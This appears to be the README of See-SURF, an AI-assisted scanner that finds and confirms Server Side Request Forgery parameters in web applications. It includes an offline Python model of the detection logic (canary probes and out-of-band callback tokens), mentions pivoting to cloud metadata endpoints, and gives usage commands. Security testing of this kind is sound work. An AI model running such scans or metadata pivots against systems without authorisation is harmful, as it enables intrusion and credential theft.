
See-SURF

See-SURF is an AI-powered security tool designed to find and validate potential Server Side Request Forgery (SSRF) parameters in web applications.

Introduction

See-SURF is an AI-assisted scanner for Server Side Request Forgery (SSRF) in web applications. It crawls a target, flags request parameters that are likely to be handed to a server-side HTTP client, and then tries to confirm each one, either by a reflected canary response or by an out-of-band callback, so that findings are validated rather than only suspected.

Key Features
  • Automated Reconnaissance: Uses a multi-threaded crawler to gather and parse pages, flagging potential SSRF parameters by keyword matching on parameter names (e.g., url, website) and by pattern matching on values that look like URLs or IP addresses. Cookie-based authentication is supported, so endpoints behind a login can be scanned.
  • Burp Suite Integration: Can parse Burp Suite sitemaps (.xml) to enhance parameter discovery before crawling.
  • Validation & Exploitation: Features AI-powered detection via providers like Google Gemini and OpenAI, analyzing response headers and generating custom payloads. It includes a smart pivot mechanism for targeting internal services (e.g., AWS Metadata) and automated vulnerability validation for Reflected/Non-blind SSRF.
  • Blind SSRF Detection: Integrates Out-of-Band (OOB) detection using Webhook.site (default) or user-provided domains to identify vulnerabilities where the server doesn't return a direct response.

How it Works
  1. Discovery: The script crawls the target for <a> links and <form> inputs, or parses a Burp sitemap file.
  2. Parameter Matching: It identifies keywords in parameter names (e.g., url, redirect, dest) or URL patterns in values.
  3. Canary Probing (Non-Blind): Each candidate parameter is set to http://example.com. If the response body contains the "Example Domain" page signature, the parameter is flagged as a potential Reflected/Non-Blind SSRF.
  4. AI Fingerprinting & Exploitation (Non-Blind): If AI is enabled, it analyzes server headers and the detected tech stack to generate specific internal payloads (e.g., AWS metadata endpoints).
  5. Validation (Non-Blind): The AI reviews the attack response to verify whether sensitive or internal information was returned, reducing false positives.
  6. OOB Probing (Blind): For each candidate parameter, a unique Webhook.site payload is generated, and the Webhook API is polled to confirm that the target server made the outbound request.
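The six steps above, reduced to an offline model. This is an added example and not See-SURF's own code: the keyword list, the fake vulnerable application, the listener hostname oob.example.net and the sample target URL are all constructed here for illustration. It shows the parts a practitioner usually has to reason about when reading a scanner's findings: how a parameter gets picked, why a reflected "Example Domain" is only a potential hit, and how a unique token per (URL, parameter) lets a blind callback be attributed to exactly one injection point.

```python
import re
import secrets
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Parameter names that often carry a server-side fetch target (assumed list,
# modelled on the examples in the text: url, redirect, dest, website).
SSRF_KEYWORDS = ("url", "redirect", "dest", "website", "link", "callback", "target", "proxy")
# Values that already look like an absolute URL or a dotted IPv4 address.
URL_VALUE_RE = re.compile(r"^(?:https?://|//)|^\d{1,3}(?:\.\d{1,3}){3}$", re.IGNORECASE)

CANARY_URL = "http://example.com"
CANARY_SIGNATURE = "Example Domain"  # text the canary page is known to contain


def is_candidate(name: str, value: str) -> bool:
    """Step 2: flag a parameter by keyword in its name or URL/IP shape in its value."""
    lname = name.lower()
    return any(k in lname for k in SSRF_KEYWORDS) or bool(URL_VALUE_RE.search(value))


def find_candidates(url: str) -> list:
    """Return the query-parameter names of `url` worth probing, in page order."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [n for n, v in pairs if is_candidate(n, v)]


def inject(url: str, param: str, payload: str) -> str:
    """Rebuild `url` with `param` set to `payload`; other parameters are untouched."""
    parts = urlsplit(url)
    pairs = [(n, payload if n == param else v)
             for n, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(pairs)))


def canary_probe(url: str, param: str, fetch) -> bool:
    """Step 3 (non-blind): does the response echo the canary page's signature?"""
    return CANARY_SIGNATURE in fetch(inject(url, param, CANARY_URL))


class OOBSession:
    """Step 6 (blind): one unique token per (url, param); a callback proves the fetch."""

    def __init__(self, domain: str):
        self.domain = domain  # listener we control (Webhook.site or our own host)
        self.tokens = {}      # token -> (url, param)

    def payload(self, url: str, param: str) -> str:
        token = secrets.token_hex(8)
        self.tokens[token] = (url, param)
        return f"http://{self.domain}/{token}"

    def correlate(self, observed_paths) -> list:
        """Map request paths seen by the listener back to the parameter that caused them."""
        hits = []
        for path in observed_paths:
            token = path.strip("/").split("/")[0]
            if token in self.tokens:
                hits.append(self.tokens[token])
        return hits


def scan(url: str, fetch, oob: OOBSession) -> dict:
    """Run discovery, the canary probe and OOB payload delivery for one URL."""
    report = {"candidates": [], "reflected": [], "oob_payloads": {}}
    for param in find_candidates(url):
        report["candidates"].append(param)
        if canary_probe(url, param, fetch):
            report["reflected"].append(param)
        payload = oob.payload(url, param)
        fetch(inject(url, param, payload))  # blind probe; outcome read back via correlate()
        report["oob_payloads"][param] = payload
    return report


class FakeTarget:
    """Constructed stand-in for a vulnerable app (no network): it fetches whatever
    `url` points at and echoes the body; `dest` is a local path and is never fetched."""

    def __init__(self, oob_domain: str):
        self.oob_domain = oob_domain
        self.listener_log = []  # request paths our OOB listener would record

    def fetch(self, request_url: str) -> str:
        target = dict(parse_qsl(urlsplit(request_url).query)).get("url", "")
        if target == CANARY_URL:
            return "<html><title>Example Domain</title></html>"
        if urlsplit(target).netloc == self.oob_domain:
            self.listener_log.append(urlsplit(target).path)
            return "<html>ok</html>"
        return "<html>nothing</html>"


# Constructed sample target: only `url` is fetched server-side, `dest` and `page` are not.
TARGET = "https://www.target.com/render?url=http://cdn.target.com/a.png&page=2&dest=/home"

if __name__ == "__main__":
    OOB_DOMAIN = "oob.example.net"  # assumed listener hostname
    app, oob = FakeTarget(OOB_DOMAIN), OOBSession(OOB_DOMAIN)
    report = scan(TARGET, app.fetch, oob)
    print("candidates:", report["candidates"])
    print("reflected:", report["reflected"])
    print("blind hits:", oob.correlate(app.listener_log))
```

Note that dest is a candidate by name but fails both probes, which is the expected outcome for a parameter the server never fetches; a real run should treat unconfirmed candidates as leads, not findings. The token-per-parameter design is what makes the blind result attributable: a single shared callback URL would tell you the server reached out, but not from which parameter.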

How to Use

Installation:

git clone https://github.com/In3tinct/See-SURF.git
cd See-SURF/
pip3 install -r requirements.txt

Basic Command:

python3 see-surf.py -H https://www.target.com

AI-Enhanced Scanning (New & Recommended):

# Using Google Gemini
python3 see-surf.py -H http://vulnerable-site.com -p google -m gemini-1.5-flash --api-key YOUR_KEY
 
# Using OpenAI GPT-4
python3 see-surf.py -H http://vulnerable-site.com -p openai -m gpt-4 -a YOUR_KEY
 
# Using local Ollama
python3 see-surf.py -H http://vulnerable-site.com -p ollama -m llama3

Authenticated Scan:

python3 see-surf.py -H https://www.target.com -c "cookie_name1=value1 cookie_name2=value2"

Authenticated with Burp Suite Sitemap:

python3 see-surf.py -H https://www.target.com -c "cookie_name1=value1 cookie_name2=value2" -b burp_file.xml
